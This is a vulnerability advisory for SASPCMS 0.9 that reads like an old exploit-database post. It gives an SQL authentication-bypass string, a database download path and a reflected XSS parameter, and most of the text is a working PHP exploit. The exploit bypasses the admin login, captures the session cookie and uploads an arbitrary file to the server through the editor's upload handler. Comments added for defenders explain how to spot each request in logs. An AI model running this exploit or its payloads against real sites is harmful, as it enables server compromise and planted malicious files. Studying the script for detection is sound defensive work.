##########################www.BugReport.ir######################################## # # AmnPardaz Security Research Team # # Title: SASPCMS Multiple Vulnerabilities # Vendor: http://www.lgasoft.com # Vulnerable Version: 0.9 (prior versions may also be affected) # Exploitation: Remote with browser # Fix: N/A ################################################################################### #################### - Description: #################### SASPCMS is an ASP Content Management System which uses MSSQL & Microsoft Access as its backend database. #################### - Vulnerability: #################### +-->Authentication Bypass POC: ' or ''=' http://[URL]/saspcms/admin/default.asp +-->Database Information Disclosure POC: http://[URL]/saspcms/db/menu.mdb +-->Cross Site Scripting (XSS). Reflected XSS in "default.asp" via the "q" parameter. POC: http://[URL]/saspcms/default.asp?q= #################### - PoC: #################### It's possible for remote attackers to upload arbitrary files by using FCKEditor after logging in to the admin area. SASPCMS Remote File Upload

SASPCMS Remote File Upload

hostname (ex:www.sitename.com):     *

path (ex: /saspcms/ or just / ):             *

Please specify a file to upload:            *

specify a port (default is 80):            

Proxy (ip:port):                                 

* fields are required

';
/*
 * Defender note: this is the published proof-of-concept for the advisory
 * above. The comments describe what each request looks like on the wire so
 * that the activity can be recognised in web-server logs and WAF rules.
 */

/**
 * Writes one raw HTTP request to $host:$port (or to the $proxy given as
 * "ip:port") and, when $response == 1, reads the whole reply into the
 * global $html. With $output == 1 the reply is also echoed, HTML-escaped.
 *
 * Globals read: $proxy, $host, $port. Global written: $html.
 * Echoes a message and die()s when the socket cannot be opened.
 */
function sendpacket($packet,$response = 0,$output = 0) {
    // Not used anywhere in this function; the proxy string is split with
    // explode() below instead.
    $proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
    global $proxy, $host, $port, $html;
    if ($proxy == '') {
        $ock = fsockopen($host,$port);
        if (!$ock) {
            $off = 1;
            // This string literal runs across the line break.
            echo ' No response from '.htmlentities($host).' ...
';
            die;
        }
    } else {
        $parts = explode(':',$proxy);
        // The proxy parts are echoed unescaped here, unlike $host above.
        echo 'Connecting to '.$parts[0].':'.$parts[1].' proxy...
';
        $ock = fsockopen($parts[0],$parts[1]);
        if (!$ock) {
            echo 'No response from proxy...
';
            die;
        }
    }
    // $off is only assigned on the direct-connect failure path, which
    // die()s first, so this guard is effectively never true.
    if($off == 1) {}else {
        fputs($ock,$packet);
        if ($response == 1) {
            if ($proxy == '') {
                $html = '';
                while (!feof($ock)) {
                    $html .= fgets($ock);
                }
            } else {
                $html = '';
                // Reads one byte at a time and stops only once EOF is reached
                // AND a CRLFCRLF (end of headers) has been seen. eregi() was
                // removed in PHP 7, so this branch fails on modern PHP.
                while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
                    $html .= fread($ock,1);
                }
            }
        } else $html = '';
        fclose($ock);
        if ($response == 1 && $output == 1) echo nl2br(htmlentities($html));
    }
}

/*
 * Main flow (runs on form submit): POST the authentication-bypass value to
 * the admin login, pick the ASPSESSIONID cookie out of the reply, upload
 * the chosen file through the bundled editor's upload handler, then GET the
 * uploaded file to check that it is reachable.
 */
$host = $_POST['host'];
$path = $_POST['path'];
$port = $_POST['port'];
// $proxy is never read from the form, so the proxy branch of sendpacket()
// is unreachable via this form.
if (isset($_POST['Submit']) && $host != '' && $path != '') {
    // intval() yields 0 for a missing port; the '' comparison relies on
    // loose comparison (0 == '' was true before PHP 8, false from 8.0).
    $port=intval(trim($port));
    if ($port=='') {$port=80;}
    // The path must start and end with '/'.
    if (($path[0]<>'/') or ($path[strlen($path)-1]<>'/')) {die('Error... check the path!');}
    if ($proxy=='') {$p=$path;} else {$p='http://'.$host.':'.$port.$path;}
    // Strip CRLF from the values before they are placed in request headers.
    $host=str_replace("\r\n","",$host);
    $path=str_replace("\r\n","",$path);
    // login to the admin area
    // Detection: a POST to admin/admin.asp whose SAspCms field decodes to
    // the literal  ' or ''='  is the authentication-bypass step from the
    // advisory; a quote character in this field is a strong alert signal.
    $query = "SAspCms=%27+or+%27%27%3D%27";
    $packet = "POST ".$p."admin/admin.asp HTTP/1.1\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
    $packet .= "Cache-Control: no-cache\r\n";
    $packet .= "Content-Length: ".strlen($query)."\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $query;
    sendpacket($packet,1,0);
    // Captures the full "ASPSESSIONIDxxxxxxxx=<24 letters>" pair from the
    // Set-Cookie header. If no such cookie comes back, $cookie_name is never
    // assigned and the Cookie header below is sent empty.
    if(stristr($html , 'Set-Cookie: ASPSESSIONID') == true) {
        $pattern = "(ASPSESSIONID[A-Z]{8}=[A-Z]{24})";
        $cookie_name = (preg_match($pattern, $html, $matches)) ?
$matches[0] : '';
    }
    // Upload File
    // Detection: a multipart POST to wexlite/default.asp with
    // precommand=ProcessUpload&folder=userfiles%5C, the fixed boundary
    // 7d51143b10418 and the MSIE 5.01 User-Agent below, followed by a GET of
    // userfiles/<digits><original filename>. The random prefix means the
    // stored filename differs from the one in the form field.
    $content = file_get_contents($_FILES['datafile']['tmp_name']);
    $name = rand().$_FILES['datafile']['name'];
    $type = $_FILES['datafile']['type'];
    $data = "-----------------------------7d51143b10418\r\n";
    $data .= "Content-Disposition: form-data; name=\"file\"; filename=\"$name\"\r\n";
    $data .= "Content-Type: ".$type."\r\n\r\n";
    $data .= "$content\r\n";
    $data .= "-----------------------------7d51143b10418--";
    $packet = "POST ".$p."wexlite/default.asp?precommand=ProcessUpload&folder=userfiles%5C&popup=true HTTP/1.1\r\n";
    $packet .= "Content-Type: multipart/form-data; boundary=---------------------------7d51143b10418\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "Cookie: $cookie_name\r\n";
    $packet .= "Cache-Control: no-cache\r\n";
    $packet .= "Content-Length: ".strlen($data)."\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    $packet .= $data;
    sendpacket($packet,1,0);
    // Verification request for the stored file.
    $packet = "GET ".$p."userfiles/$name HTTP/1.1\r\n";
    $packet .= "Host: ".$host."\r\n";
    $packet .= "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)\r\n";
    $packet .= "Cache-Control: no-cache\r\n";
    $packet .= "Connection: Close\r\n\r\n";
    sendpacket($packet,1,0);
    // Success is judged solely on the status line of that final GET; the
    // string literal in the else branch runs across the next two lines.
    if(stristr($html , '200 OK') != true) {echo "Exploit Faild...";} else echo "Exploit Succeeded...
http://$host:$port$path"."userfiles/$name
";
}
?> #################### - Solution: #################### Edit the source code to ensure that inputs are properly sanitized. #################### - Credit: #################### AmnPardaz Security Research & Penetration Testing Group Contact: admin[4t}bugreport{d0t]ir www.BugReport.ir www.AmnPardaz.com # milw0rm.com [2009-04-08]